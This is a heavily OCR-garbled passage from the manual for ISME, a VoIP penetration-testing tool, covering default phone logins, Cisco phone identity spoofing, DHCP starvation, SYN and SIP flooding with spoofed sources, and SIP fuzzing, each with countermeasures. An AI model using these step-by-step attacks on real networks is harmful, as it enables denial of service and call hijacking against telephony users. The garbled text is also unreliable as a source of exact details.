AMNA \| isme.pl (IP Phane Scanning Made Easy)
| Flle History Fiiter Tools | Exploits ‘

Subnet to scan (192.168.1.0/2° - :
Default log: Aastra IP Phones —_ —S

Default log: Mitel IP Phones
Default loy: Polycom SoundPoint IP Phones
Default log: SNOM IP Phones

Cisco Phone: Ringer (SCCP)
Cisco Phone: Fonwarder (S3CCP)
Cisco Phone: Logout mobility feature abuse

SIP fliooder {Invite, Options, Register)
3P Fuzzing - Protos SIP

Server: DHCP Starvation

Server: DNS Subnet resolver /

r_{_'l— Ser‘\.r‘er: TCP S¥H Flood —i'S

Steps 2 to 5 are identical to 5.2 with Aastra phorse Please refer to it.

Note: SNOM IP Phones have different default login/passiaepending on models and
versions. The following couples are currently tdste
e administrator/0000
e admin/admin
e administrator/0000

» -/0000

&M N Test default SNOM Login/Password

File

# |IP Phone from scanned subnet

Selected scan file {.isme): istersfc:edrichaiIletfismefsc:an_historyfzm 2-1-13-14hZ3mn -182.165.12 &l

- Single IP Phone

IP address to scan: |

_______________________________________________________________________________ %

Starting to test detected IP Phones for default SNOM Login/Password. . =1

File loaded: /Users/cedrichaillet/isme/scan history/2012-1-13-14h23mn -192.168.1

2.80. 1sme

102 168,12 B5: No login/password set to access the web interface — WARNING -

192,168 12 87: test administrator 0000 - not used =)

192.168.12.87: test adnin/0000 - not used =)

192 168. 12 87: test adminSadmin - not used :-)

192,168 .12 87 /0000 - not wsed :-}

192,168 12 90: test administrator 0000 - not used =)

192,168 12 90: test admins0000 - not wsed -}

192.168. 12 90: test adminfadmin - not used :-)

192.168.12.90: /0000 - not wsed :-}

192 168 12 94 : test administrator /0000 - not vsed =)

192 168 12 94 test admin 0000 - not used =)

192,168 12 94: test adminfadmin - not used ;-)

192.168.12. 94 /0000 - not wsed -}

———————————————————————— e E el
A
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5.5- Polycom SoundPoint IP Phones

Step 1: Menu “Tools -> Default log: Polycom SoundPoint PRone”. A new window will
open.

ANO 1\ isme.p| (IP Phone Scanning Made Easy)

| File History Filter Toolsl Exploits

Subnet to scan (192.168.1.0.2 - - - - 0 0

Default log: Aastra IP Phones

Default log: Mitel IP Phones

Default log: Polycom SoundPoint IP Phones
Default log: SHOM IP Phones

Cisco Phone: Ringer {SCCP)
Cisco Phone: Forwarder (SCCP)
Cisco Phone: Logout mobility feature abuse

SIP flooder {Invile, Options, Register)
31P Fuzzing - Protos SIP

Server: DHCP Starvation
Server: DNS Subnet resolver 7

rSI— Server: TCP 5¥N Flood —IX

Steps 2 to 5 are identical to 5.2 with Aastra phorse Please refer to it.

Note: Polycom soundpoint web server could be protectgdalithentication in different
manners. By default, only specific web pages amtepted. In this case, the messaye
login/password set to access the main web gui — MVMYK” will appear. The obviou
counter measure is configuring a global authenanat

[}

Step 4:Save the result
Select menu “File -> Save scan results”.

[ W ) || Test default SoundPoint Login/Password

Launch brute force attack
Save scan results
Exit

P e

%| Test default SoundPoint Login/Password

File

4 Scan asubnet
Subnet to scar- oo o e e e

800 x| Save As
~~ single IPF
|P address to| Directory: fUsers/cedrichailletismefuser_data — |
Statting [ test main menu.tst 1-
——————— Test
63,00 25, 25
——————— Test
&3, 99, 6. 26
63.99. 26, 26
=] =
File name: | | Save |
— | Cancel |

Date: 15/11/2012 By Cedric Balillet Page 26



ISME v0.7

6- Tools: Cisco IP Phone attacks

6.1- Cisco phone ringer

6.1.1- Concept
Idea: taking the identity of akinny cisco phone, and use it to register with the CUaM
make the other phones ringing.

Core infrastructure

o Unplug phone1000 and spoof his identity ro register on the CUCM
o Make call to other phones to create a perpetual ringing

6.1.2- Using ISME to do it

Note: The attack does not depend of earlier scans maddSME.

Supported IP Phone models6901, 6911, 6921, 6945, 6961, 7910, 7911, 7914),78941,
7942, 7945, 7960, 7961, 7962, 7965, 7970, 79715,78341, 8945, 8961

To launch the attack interface, go to menu “Tobl€isco Phone: Ringer (SCCP)”

o N ) % | isme.pl (IP Phone Scanning Made Easy)
Fle History Filter Tools | Exploits

Subnet to scan (192.168.1.0/2
Default Log: Aastra IP Phohe
Default log: SHOM IP Phone

=

Cisco Phone: Ringer {SCCP)
Cisco Phone: Forwarder (SCCP)

Server: DHCP Starvation
Server: DNS Subnet resolver
LAN: TCP 5¥H Aood

A new window will open with information to provid&hey are a necessity to be able to spoof
the identity of a working IP Phone. Be precise athing will happen.
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. YaYa |\ Cisco IP Phone Ringer (Skinny)
File

CUCHM IP Address: |'I 0.0.01
Phone to spoof name (SEPD0127FAESFAD): ISEF‘DD‘I 19327ERBYY

6901
6911 =
6921 /

FPhone to spoof type:

Phone to spoof IP Address: 182 - 168 07 .10
Ringing phone M1 number: |1 om
Ringing phone M2 number: |‘I ooz
Humber of ringing to launch: IS
A
v
Many thanks to Stephane Gorse for his work on this one. ,

Note: no control is done on user provided information.

Once all information are provided, go to menu “Fi#eLaunch ringing attack” to start the

attack.

L Wi W] x| Cisco IP Phone Ringer (Skinny) _
File |

Launch Hinging attack
Exit

00127 FAEGFAD): ISEF'EID1 19327ERTT

fBam A

The phones configured with the numbers provided shdd start to ring. Only two

numbers are configurable to use this tool as a pré@f concept and nothing else.

Date: 15/11/2012 By Cedric Balillet

Page 28



ISME v0.7

Screen after a successful attack:

fOO [\ Cisco IP Phone Ringer (Skinny)
| File

CUCM IP Address: i‘l 9216810049
Phone to spoof name {SEPD0127FAEGFAD): |SEPDD1 BS3BEAIAE

7345
Phone to spoof type: 7960 —
|V

7961
Phone to spoof IP Address: |13z .|168 .7 |tz

Ringing phone N1 number: |3?43

Ringing phone H2 numbetr: |1 ooz

Number of ringing to launch: |3

---» Dropping the call
---» the call is closed
---3 Making call to :1002
---: Dropping the call
-—-» the call is claosed
=== Making call to :3743
---» Dropping the call
-==3 the call is closed
-——» Making call to :1002
---% Dropping the call
---» the call is closed _
---3 Making call to :3743
---» Dropping the call
——=% the call is closzed
---» Making call to :1002
---3 Dropping the call
---» the call is closed
s=========3 A1l calls are closed ss=========

A

b

Many thanks to Stephane Gorse for his work on this one.

6.1.3- Countermeasure

The attack is based on the capacity to spoof Im&halentity. A strong authentication with a
certificate, either MIC or LCS, will render it unszessful.
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6.2- Cisco phone forwarder

6.2.1- Concept

Idea: Spoofing the identity of skinny cisco phone, and use it to register with the CU&d
set a forward on it.

Core infrastructure

o spoof phone identity to register on the CUCM
€ Setforward
o Call the phone and see what happen ...

6.2.2- Using ISME to do it

Note: The attack does not depend on earlier scans miticléSME.

Note 2: after the attack the real physical phone will bean unstable state for around one
minute. We have spoofed his identity to change diwafiguration of CUCM, therefore he
need to resynchronize with him.

Supported IP Phone models6901, 6911, 6921, 6945, 6961, 7910, 7911, 79140,78941,
7942, 7945, 7960, 7961, 7962, 7965, 7970, 79715,78941, 8945, 8961

To launch the attack interface, go to menu “Tobl€isco Phone: Forwarder (SCCP)”

[ 1 % isme.pl (IP Phone Scanning Made Easy)

File History Filter Tuulsl Exploits |

Subnet to scan (192.168.1.0/2

Default Log: Aastra IP Phone
Default log: SHOM IP Phone

=

Cisco Phone: Ringer {SCCP)
Cisco Phone: Forwarder (3CCP)

Server: DHCP Starvation
Server: DNS Subnet resolver
LAH: TCP 3¥H Aood
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A new window will open with information to provid&€hey are a necessity to be able to spoof
the identity of a working IP Phone. Be precise athing will happen.

ann \ Cisco IP Phone Forwarder (Skinny)
| File |

CUCH IP Address: |1 92.168.80.92
Phone to forward name (SEPO0127 FAEGBFAD): ISEF'DD'I 27FAEGFAD

{6901 |
Phone to forward type: iB.911 =
{6921 /
Phiohe to forward IP Address: {192 . |16 8 CF o
Forward target number: {1001
X
¥

Many thanks to Stephane Gorse for his work on this one.

Note: no control is done on user provided information.

Once all information are provided, go to menu “FielLaunch forwarding attack” to start the
attack.

A0 || Cisco IP Phone Forwarder {Skinny)

File |

FE T T e e R
Launch forwarding attack
y D127FAEBFAD): |SEPDD‘I Z7FAEGFAD
Exit
[ran1 1

The spoof IP Phone should restart and have a isearfd to the chosen number.
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Screen after a successful attack:

MANO [\| Cisco IP Phone Forwarder (Skinny)

File

CUCH IP Address: |1 3216810043
Phone to forward name (SEPD0127FAEBFAD): !SEF’DD1 BEIBGAIAE

7945
Phone to forward type: 7960 —
7961 /
Phone to forward IP Address: EE . |68 -f7 7
Forward target number: |1001
==========3 SoftKeyTemplateReg Message ===========

==========} ZoftKeySetReq Message =

==========} ConfigStat Message ====
==========3 LineStat Message ===========

==========3 RegisteravailableLine Message ===========
s=========3 LineStat Message ===========

-==% Transfering to

1001

--=» the transfer is completed

=============3% Forwar dofg ==============

|

Many thanks to Stephane Gorse for his work on this one.

6.2.3- Countermeasure

The attack is based on the capacity to spoof Im&halentity. A strong authentication with a
certificate, either MIC or LCS, will render it unstessful.
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6.3- Logout mobility feature abuse

6.3.1- Concept

VoIP DMZ

o &;

Extension mobility

@ Hackersend the logout url to CUCM with IP Phone’s SEP reference
o CUCM send the logout command to the IP Phone

Useris logged out and must re authenticate to access his rights and
data

6.3.2- Using ISME to do it

Step 1: To launch the attack interface, go to menu “Taeoal<Cisco Phone: Logout mobility

feature abuse”

ANA \| isme.pl (IP Phone Scanning Made Easy)

File History Filter Toolsl Exploits |

Subnet to scan (192.168.1.0/2
Default Log: Aastra IP Phone
Default log: SHOM IP Phone
Default log: Polycom SoundPoint IP Phone

Cisco Phone: Ringer (SCCP)
Cisco Phone: Forwarder {S3CCP)
Cisco Phone: Logout mobility feature abuse

3IP flooder (Invite, Options, Register)
SIP Fuzzing - Protos SIP

3erver: DHCP Starvation
Server: DHNS Subnet resolver
Server: TCP S¥YN Flood

=l

A new window will open.
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ano [\| Cisco IP Phone: Mobility feature abuse
File |

¥ Disconnect one IP Phone

IP Phone MAC address (001122334455): |
CUCHP IF Address (192.168.0.154):
~ Disconnect all IP Phones from scanned subnet

load scan: |
CUCMP IP Address {172.16.0.154):

=

Step 2: Select option “Disconnect one IP Phone” and eGléCM IP address and IP Phone
MAC address. Beware of the format (001122334455 kvis not usual.

Ao |\| Cisco IP Phone: Mability feature abuse
File |

# Disconnect one IP Phone
IP Phone MAC address (001122334455): |DD1122334455
CUCMP IP Address (192.168.0.154): |1 9z.168.0.254] |

Step 2bis (disconnect all IP Phones from scannedimet):
Select save scan file (extension .isme). Go to niilet> Select subnet scan to load”.

AaNOn || Cisco IP Phone: Mobility feature abuse
‘ Fllel |

Select subnet scan to load
334455): |

Launch attack
54):

Save scan results

2 m scanned subnet
Exit.
Ban A\ Open
Directory: fUsersicedrichailletfismefscan_history — |

[ 2011-11-13-12h58Hn -192168.7.00sme [ 2012-0-21-16h51mn -202.¢
[] 2011-11-18-17h36mn -192 168,12 Disme [] 2012-0-21-16hS3mn ~202.¢
[ 2011-11-13-17h3mn -192.166.12.0dsme (] 2012-0-21-16h53mn -172."
[1 2011-11-6-11h3mn -192.168.46.0isme [ 2012-0-21-17h3mn -130.2(
[} 2011-11-3-16h47mn -10.133.139.0isme [ 2012-0-5-16h51mn -192.1¢
[} 2011-11-9-18h13mn -10.193.154.0isme [ 2012-1-13-14h11mn -192."
[1 2012-0-12-16h58mn -10.158.212.0isme [ 2012-1-13-14h23mn -192."

| =

Fle name: [2011-11-13-12h58mn -192.168.7.0.isme

Open

Files of type: isme files (*.isme) - | Cancel |

# Disconnect all IP Phones from scanned subnet
load scan: |fUsersfcedricbaiIIetfismefscan_histuryfzm 1-11-13-12h58mn -192.168.7.0.isme
CUCHMP IP Address (172.16.0.154): |
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Note: CUCM IP Address should be in the backup of theansed subnet but | did found out
that the extraction of servers ip addresses wasfuligt reliable. Therefore, | preferred a

manual entry.

Step 3:Launch the attack. Go to menu “file-> Launch dttac

aNnm |\ Cisco IP Phone: Mobility feature abuse

| File

~~ Disconnect one IP Phonhe

IP Phone MAC address (001122334495): I

CUCMP IP Address {152.166.0.154): I

% Disconnect all IP Phones from scanned subnet

load scan: !stersfcedricbaillet-’ismefscan_histnryfzm1—11—13—12h58mn -192 168.7 D.isme

CUCHMP IP Address (172.16.0.154): I‘I 92.168.0.254]

02.168.7.0. 1sms.

——————— Analyzing line 0

Logout command sent to CUCHM 192, 168.0. 254
Targetted IP Phone: SEP44d3caTlcihi
Attack done.

------- Analyzing line 1

Logout command sent to CUCM 192.168.0. 254
Targetted IP Phone: SEPDOCESZDOTA4D
Attack done.

——————— Analyzing line 2

Logout command sent to CUCHM 192 168, 0. 254
Targetted IP Phone: SEPO01ES3E8A3AE
Attack done.

Starting to analyze /Users/cedrichalllet/isme/scan history/2011-11-13-1Zh58mn -1

Note: The logs are just a confirmation that urls haverbsent to CUCM. It is not an

indication that phones are effectively log out.

6.3.3- Countermeasure

An option in “CUCM enterprise parameters” specifidgat only trusted IP addresses
(registered) are allowed to login/logout.
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7- Tools: LAN & Servers

The core infrastructure providing services to IPoihis highly sensible and the smaller
interruption of one server can have a huge impadhe whole panel of IP Phone. Therefore,
it should be test extensively. This new rubric aahsonsolidate existing attacks in one place.

7.1- DHCP Starvation

7.1.1- Concept

DHCP Starvation is an old and well known attacke ®m is an attribution of all the existing
IP address available on DHCP server and rendeubéatess.

1000 x DHCP Discover

e
™ 33 5
. v | | Dotads |
T i Total Addresses 243
InUse 243 100%)
ooy

DHCP

Yersinia
Rehesh Chie

» New IP Phones won't start
Random problems

DoS on a whole subnet

7.1.2- Using ISME to do it

Note: the script is configured to send DHCP discovehwite PC MAC address at the layer
2. This means that port security will be uselessuich a configuration. Take care.

To launch the attack interface, go to menu “ToolServer: DHCP Starvation”

AaNnn % isme.pl {IP Phone Scanning Made Easy)
| File History Filter Toolsl Exploits |

Subnet to scan (192.168.1.0/2° i
Default Log: Aastra IP Phone

Default log: SMOM IP Phone

I

Cisco Phone: Ringer (SCCP)
Osco Phone: Forwarder (SCCP)

Server: DHCP Starvation
3erver: DN3 Subnet resolver
LAN: TCP S¥HN Flood

A new window will open. Select the number of DHCBddver to send depending of the
subnet size. A temporization has been includetienstript. The computer sending is too fast
for a good efficiency, which is solve with the temsngation, so do not be surprised by an
appearance of slowness.
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[ e |%] DHCP Starvation (with port-security bypass)
File

s 912 Dhcp Discover
~ 1024 Dhcp Discover
~- 10000 Dhcp Discover

LA

To launch the attack interface, go to menu “Fild.aeinch DHCP Starvation attack”.

MNO [%| DHCP Starvation (with port-security bypass)

Launch DHCP Starvation attack
STOP DHCP Starvation attack

Exit
l X

The attack is straight forward. The packets will @t and the script will stop. A clear
message is log in the interface when this stattesaish.

o M M) || DHCP Starvation (with port-security bypass) _
File |

# 512 Dhcp Discover
~~ 1024 Dhcp Discover
~~ 10000 Dhcp Discover

DHCP Discover number 497 sent.
DHCE Discover number 498 sent.
DHCP Discover number 4989 sent.
DHCE Discowver number 500 sent.
DHCE Discover number 501 sent.
DHCP Discover number 502 sent.
DHCE Discowver number 503 sent.
DHCE Discover number 504 sent.
DHCP Discover number S05 sent.
DHCE Discover number 506 sent.
DHCE Discover number 507 sent:
DHCE Discowver number 508 sent.
DHCP Discover number 509 sent.
DHCP Discover number 510 sent.
DHCP Discover number 511 sent.

A

DHCP Starwvation attack is owver. DHCP serwver shouldn't he able to deliver any IP
addcess if no counter measuce has been implemented.

7.1.3- Counter measure

DHCP Snooping functionality verifies the coherebeyween layer 2 and applicative lever for
DHCP packet. Packets sent with ISME will trigges gecurity rule and be discarded.
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7.2- DNS Subnet resolver

7.2.1- Concept

By being plug in the LAN and having an IP addres$?C has a very effective mean to
identify core infrastructure servers through DNS.

Indeed, once a first scan has been done with ISMEPPdhone subnet, the servers’ subnet is
known.

With this information, we have just to associatéivacip address with the server name
through DNS request, which will be a serious tiraeirsg compare to a brute force attack.

7.2.2- Using ISME to do it

To launch the attack interface, go to menu “ToblServer: DNS Subnet resolver”

A;N.O % isme.pl (IP Phone Scanning Made Easy).
File History Filer Tools | Exploits |
Subnet to scan (1921681002~
Default Log: Aastra IP Phone I
Default log: SHOM IP Phone
Default log: Polycom SoundPoint IP Phone
Cisco Phone: Ringer (SCCP)
Cisco Phone: Forvwarder (SCCP)
SIP flooder (Invite, Options, Register)
SIP Fuzzing - Protos SIP
Server: DHCP Starvation
Server: DNS Subnet resolver
3erver: TCP S5¥YHN Flood
Enter the subnet to scan.
;O |\ IP Subnet DNS Resolver
File |
Subnet to workout (192.168.1.0/24): |1 92 166.100.0/27 |
I Y

To launch the attack interface, go to menu “Fild.aeinch NS Resolver analyze”.

ifANOn '\ IP Subnet DNS Resolver
File |
1921661 00.0027] |
Launch DH3 Resolver analyze
Save scan results
Exit |
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| IP Subnet DNS Resolver

File

Subnet to workout (192.168.1.0/24): [132.168.100.0/27 |

192.168.100.18;

192,168,100, 3; vmwarel. fremecourt. com
192.168.100.5: chagasse. fremecouct. com
192.168.100.6: mpex. fremecourt. com

192 168.100. 7: mpexl. fremecourt. com

192.168.100.8: cupl. fremecourt. com

192 168.100.10: chapi. fremecourt. com
192.168.100.11: exchangeZk?. fremecourt. com
102,168,100, 12 exchangefkl0. fremecourt. com
182 168.100.13: hyperv. fremecourt. com
192.168.100.16: tampax. fremecourt. com

192, 168.100.19: ocs2kll. fremecouct. com
102 168.100. 24: chabit. fremecourt. com
192 168 100,28 alycone. fremecouct. com

ManNn

And don’t forget to save them or you will have witagain.

5[ IP Subnet DNS Resolyer

Launch DNS Resolver analyze
Save scan results
Exit

+|192.166.100.0/27 |

urt. com
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7.3- TCP SYN FLood

7.3.1- Concept

TCP Starvation is an old and well known attack. étbeless, it is still effective against
services using TCP that are not protected by avéile Thus, a CUCM could be render
useless with a simple PC through a TCP Starvattaclaon signalization port.

VolP DMZ

- Starvation of TCP ressources on the target port
Synchronization between server & IP Phones is down

IP Phones are freezed then reboot to resynchronize

SCCP:TCP 2000
SIP: TCR/UDP 5060

7.3.2- Using ISME to do it

To launch the attack interface, go to menu “Tool&AN: TCP SYN Flood”

aNO | isme.pl (IP Phone Scanning Made Easy)
| File History Filter Tools | Exploits |
Subnet to scan (192.168.1.0¢2°
Default Log: Aastra IP Phone 3
Default log: SHOM IP Phone =
Cisco Phone: Ringer (SCCP)
Gsco Phone: Forwarder (SCCP)
Server: DHCP Starvation
3erver: DN3 Subnet resolver
LAN: TCP 5YHN Food
Enter CUCM IP address and choose signalizationtpdtbod.
MMM |\ TCP Syn Flood
Fle
IP Arddress to flood (192.168.1.1): [132.165.0.254] |
5060 (SIP) N
TCP port to flood: 5061 (SIP TLS) ]
2000 (3kKinny) i
A
v
Stop flooding I
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Go to menu “File ->Launch TCP SYN FLOOD”

o M ) [\ TCP Syn Flood
‘ ﬁlel
“““““““ Im Ay:|10158.213.159 |
Launch TCP S¥M Flood
) 5060 (SIP)
Eat 5061 (SIP TLS) N
2000 (Skinny) 4
N
.4
Stop flooding _I
To stop the flooding, use the button at the bottditine windows.
800 | TCP Syn Flood
File
IP Address to flood (192.168.1.1): [10.158.213.159 |
5060 {SIP)
TCP port to flood: 3061 (3IP TLS) _]
2000 (Skinny) /
Start. flooding on TCP Port: 2000 (Skinng)
Stop flooding on TCP Port: 2000 (Skinny)
Vi
Stop flooding I

Errors are sometime coming up in the console wireddwlo not know what is causing them

yet Nevertheless, it does not impact the attack seadevorry about it.
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Thread 46 terminated abnormally: sendto() at fopt/local/lib/perl5/site_perl/5.12.4/darwin-thread-n L2
ulti-2level/Net/RawlP.pm line 63@.

Thread 47 terminated abnormally: sendto() at fopt/local/lib/perlS/site_perl/5.12.4/darwin-thread-m
ulti-2level/Net/RawIP.pm line G38.

Thread 4B terminated abnormally: sendto() at fept/local/lib/perl5/site_perl/5.12.4/darwin-thread-n
ulti-2level/Net/RawIP.pm line 63@.

Thread 49 terminated abnormally: sendto() at fopt/local/lib/perl5S/site_perl/5.12.4/darwin-thread-m
ulti-21level/Net/RawIP.pm line 638.

Thread 50 terminated abmormally: sendto() at fopt/local/lib/perl5/site_perl/5.12.4/darwin-thread-m
ulti-2level/Net/RawIP.pm line 638.

Thread 51 terminated abnormally: sendto() at fopt/local/lib/perl5/site_perl/5.12.4/darwin-thread-m
ulti-2level/Net/RawIP.pm line 638.

Attempt to free non-existent shared string '_ErrorInfo_', Perl interpreter: 8x100B@8008 at /opt/le
cal/lib/perl5/site_perl/5.12.4/darwin-thread-multi-2level/Tk.pm line 424,

Thread 52 terminated abnormally: sendto() at fept/local/lib/perl5/site_perl/5.12.4/darwin-thread-n
ulti-2level/Net/RawIP.pm line G38.

Thread 53 terminated abmormally: sendto() at fopt/local/lib/perl5/site_perl/5.12.4/darwin—thread-m
ulti-21level/Net/RawIP.pm line 638.

Attempt to free non—existent shared string '_ErrorInfo_', Perl interpreter: @x1088@080@ at /opt/lo
cal/lib/perl5/site_perl/5.12.4/darwin-thread-multi-2level/Tk.pm line 424.

Thread 54 terminated abmormally: sendto() at fopt/local/lib/perl5/site_perl/5.12.4/darwin-thread-m
ulti-2level/Net/RawIP.pm line 63@.

Attempt to free non-existent shared string '_ErrorInfo_', Perl interpreter: @x10@800800 at /fopt/lo
ial/lih!perlesite_per1/5.12.dfdarwin—thread—multi—!levelka.pm line 424,

7.3.3- performance issue

The script is sending an average of 7 000 paclextsgcond on my computer.

If higher performance is necessary, | would recomairt® use tools written in a language that
is not interpreted (netwox option 76 for example).
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8- Tools: SIP Flooder

8.1- Concept

VolP DMZ
““ Starvation of SIP resources
ﬁl Specific actions of IP Phones are no more
'.'".H'."'.\S|P Wi possible or get random errors
II' II'I l't \
i

SCCP:TCP 2000
SIP: TCR/UJDP 5060

8.2- Using ISME to do it

Step 1: To launch the attack interface, go to menu “TooisLANSIP Flooder (Invite,
Options, register)”

/8O0 \| isme.pl (IP Phone Scanning Made Easy)
| Fle History Filter Tools | Exploits
Subnet to scan (192.1681.002
| Default Log: Aastra IP Phone T
Default log: SHOM IP Phone =
Cisco Phone: Ringer {(SCCP)
Cisco Phone: Forwarder {SCCP)
SIP flooder {Invite, Options, Register)
Server: DHCP Starvation
Server: DNS Subnet resolver
LAN: TCP 3¥H Food
Step 2:enter the target IP address and choose SIP meygeage
8.MNE [X| SIP Fluodin_g_
File
IP Address of SIP Device to flood: 157 1680254 |
INVITE |IX
Select SIP Message Type: OPTIONS J
REGISTER Vi
I 4]

Step 3:Launch attack with the menu “File -> Launch SiBdsl".

AaNM |\ SIP Flooding

ice to flood: '1 97 166.0.254
Launch SIP Flood

: |INVITE Y
Eoil iype: OFTIONS |
REGISTER 7

Step 4:sStop flooding attack, just click on the bottonttbn “Stop flooding”.
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ann | SIP Flooding
File
IP Address of SIP Device to flood: |1 392.168.0.254 |
INVITE
Select SIP Message Type: OPTIOHNS J
REGISTER i
Start flooding
Stop flooding
£
Stop flooding I

8.3- Details of crafted packets
8.3.1- SIP Invite packet

¥ Session Initiation Protocol
P Request-Line: INVITE sip:isme dest@l0.158.213.152 SIP/2.0
= Message Header
P Via: SIP/2.0/UDP 32.124.153.11;branch=zshcajk
P To: =sip:10.158.213.152@10.158.213. 152~
b From: =sip:isme_src@32.124.153.11=; tag=qwzng
Call-ID: 1sme src@E32.124.153.11
I CSeq: 911319 INVITE
P Contact: sip:isme src@32.124.153.11
Content-Type: application/sdp
Max-Forwards: 70
User- Agent: ISME vO.S
Subject: You've been flood

Source IP address is random for each packet.

8.3.2- SIP Options packet

¥ Sesslon Initiation Protocol
P Request-Line: OPTIONS sip:l10.158.213.152 SIP/2.0
= Message Header
b Via: SIP/2.0/UDP 124.46.128.40:9;branch=z9hG4k
From: =sip:isme_src@l24.46.128. 40=; tag=qwzng
To: =s1p:10.158.213.152=
Call-ID: 1sme_src@l24.46.128.40
CSeq: 959070 OPTIONS
b Contact: sip:isme src@l24.46.128.40
Max-Forwards: 70
User-Agent: ISME v0.5

P
3

-

Source IP address is random for each packet.
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8.3.3- SIP Register packet

- Session Initlation Protocol
[

Request-Line: REGISTER sip:10.158.213.152 SIP/2.0
= Message Header
b Via: SIP/2.0/UDP 137.189.247.88:5060
P From: ISME <sip:lsme_src@l37.189.247.88>; tag=qwznhg
b To: TARGET =sip:target@l0.158.213.152=
Call-ID: 1sme-src@l37.189.247.88
b CSeq: 985714 REGISTER
P Contact: sip:lsme src@l37.189.247.88
Allow: NOTIFY
Allow: REFER
Allow: OPTIONS
Allow: INVITE
Allow: ACK
Allow: CANCEL
Allow: BYE
User-Agent: ISME vO.5

Source IP address is random for each packet.

8.4- performance issue

The script is sending an average of 16 000 pag@etsecond on my computer.

If higher performance is necessary, | would recomin® use tools written in a language that
is not interpreted (sipsak for options flooding éxample — sipsak.org).
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9- Tools: SIP Fuzzers

9.1- Concept

Fuzz testing or fuzzing is a software testing tégh@, often automated or semi-automated,
that involves providing invalid, unexpected, or dam data to the inputs of a computer
program. The program is then monitored for excegtisuch as crashes, or failing built-in
code assertions or for finding potential memonkseduzzing is commonly used to test for
security problems in software or computer systems.

9.2- PROTOS SIP

Protos can be found at the following url:
https://www.ee.oulu.fi/research/ouspg/PROTOS TesieScO7-sip

9.2.1- Test case details
Legend:

- "Name" column represents the tag-names of thegtesips. Tags reflect the header
and field names in the protocol specification. Tegs be used to follow which parts
of the PDU are being tested.

- "Exceptional Elements" column describes which ekoepl element categories are
integrated in the test-group.

« "First Index #" and "Test Cases" columns desciigefirst test-case number for a test-
group, and the number of cases from there on.

. First Test
Name Exceptional Elements Index # Cases
valid n/a 0 1
SIP-Method overflow-general, overflow-space, overflow- nuII 193
fmtstring, utf-8, ansi-escape
SIP-Request-URI sip-URI 194 61
SIP-Version sip-version 255 75
SIP-Via-Host ipv4-ascii 330 106
SIP-Via-Hostcolon  overflow-colon 436 16
SIP-Via-Hostport integer-ascii 452 46
SIP-Via-Version sip-version 498 75
SIP-Via-Tag sip-tag 573 57
SIP-From- overflow-general, overflow-space, overflow- nuII
: 630 193
Displayname fmtstring, utf-8, ansi-escape
SIP-From-Tag sip-tag 823 57
SIP-From-Colon overflow-colon 880 16
SIP-From-URI sip-URI 896 61
SIP-Contact- overflow-general, overflow-space, overflow-null
: ) . 957 193
Displayname fmtstring, utf-8, ansi-escape
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SIP-Contact-URI sip-URI 1150
SIP-Contact-Left- 00 jeftbracket 1211
Paranthesis
SIP-Contact-Right- overflow-rightbracket 1227
Paranthesis
SIP-To overflpw-general, oyerflow-space, overflow-null12 43
fmtstring, utf-8, ansi-escape
SIP-To-Left- overflow-leftbracket 1436
Paranthesis
SIP-To-Right- overflow-rightbracket 1452
Paranthesis
SIP-Call-Id-Value overflpw-general, oyerflow-space, overflow-null1468
fmtstring, utf-8, ansi-escape
SIP-Call-1d-At overflow-at 1661
SIP-Call-Id-Ip ipv4-ascii 1677
SIP-Expires integer-ascii 1783
SIP-Max-Forwards  integer-ascii 1829
SIP-Cseq-Integer integer-ascii 1875
SIP-Cseq-String overflpw-general, oyerflow-space, overflow-null1921
fmtstring, utf-8, ansi-escape
SIP-Content-Type overflpw-general, oyerflow-space, overflow-null211 4
fmtstring, utf-8, ansi-escape, content-type
SIP-Content-Length  integer-ascii 2361
SIP-Request-CRLF  crlf 2407
CRLF-Request crif 2417
SDP-Attribute-CRLF crlf 2427
SDP-Proto-v- overflow-general, overflow-space, overflow-null
e ) . 2437
Identifier fmtstring, utf-8, ansi-escape
SDP-Proto-v-Equal  overflow-equal 2630
SDP-Proto-v-Integer integer-ascii 2646
SDP-Origin- overflow-general, overflow-space, overflow-null
) . 2692
Username fmtstring, utf-8, ansi-escape
SDP-OriginSessionicinteger-ascii 2885
SDP-Origin- overflow-general, overflow-space, overflow-null
) ) 2931
Networktype fmtstring, utf-8, ansi-escape
SDP-Origin-Ip ipv4-ascii 3124
SDP-Session overflpw-general, oyerflow-space, overflow-null3230
fmtstring, utf-8, ansi-escape
SDP-Connection-  overflow-general, overflow-space, overflow-null
. 3423
Networktype utf-8, fmtstring
SDP-Connection-Ip  ipv4-ascii 3611
SDP-Time-Start integer-ascii 3717
SDP-Time-Stop empty 3763
SDP-Media-Media  overflow-general, overflow-spawegrflow-null, 3764
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fmtstring, utf-8, ansi-escape
SDP-Media-Port integer-ascii 3957 46
overflow-general, overflow-space, overflow-null

SDP-MediaTransport ) i 4003 118

fmtstring, ansi-escape
SDP-Media-Type integer-ascii 4121 46
SDP-Attribute- overflow-general, overflow-space, overflow-null

) . 2167 118

Rtpmap fmtstring, ansi-escape
SDP-Attribute-Colon overflow-colon 4285 16
SDP-Attribute- integer-ascii 4301 46
Payloadtype
SDP-Attribute- integer-ascii 4347 118
Encodingname
SDP-Attribute-Slash  overflow-slash 4465 16
SDP-Attribute- , N
Clockrate Integer-ascii 4481 46

9.2.2- Using ISME to do it

Step 1:To launch the attack interface, go to menu “TeslSIP Fuzzing — PROTOS SIP”

ANA N\ isme.pl (IP Phone Scanning Made Easy)

File History Filter Toolsl Exploits I

Subnet to scan (192.1680.02° -
Default Log: Aastra IP Phone

Default log: SHOM IP Phone
Default log: Polycom SoundPoint IP Phone

A

Cisco Phone: Ringer (SCCF)
Cisco Phone: Forwarder {(SCCP)

SIP flooder (Invite, Options, Register)
SIP Fuzzing - Protos SIP

Server: DHCP Starvation
Server: DHS Subnet resolver

LAN: TCP 5¥H Aood -
f

Step 2:Enter the target IP address (one target only)
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AOAM % SIP Fuzzing (protos)
File

Target IP Address (192.168.1.1):[192.168.0.254 |

Select fuzzing method: . Yes (Al fuzzing cases) # HNo (Selected fuzzing cases)
SIP-Method (1-193) ]
SIP-Request-URI (194-254) | J

SIP-Version {255-329)
SIP-Via-Host (330-435)
S1P-Via-Hostcolon (436-451)
SIP-Via-Version (498-572)
SIP-Via-Tay (573-629)
SIP-From-Displayname (630-822)
SIP-From-Tay (523-879)
SIP-From-Colon (880-895)

Select fuzzing method:

r';

Detail of fuzzing cases can be found either in ISME documentation or on PROTOS
weh site fhttps: /fwor ee oulu £ifresearch/ouspg/PROTOS Test-Suite c07-sip)

Step 3:Select the fuzzing method.
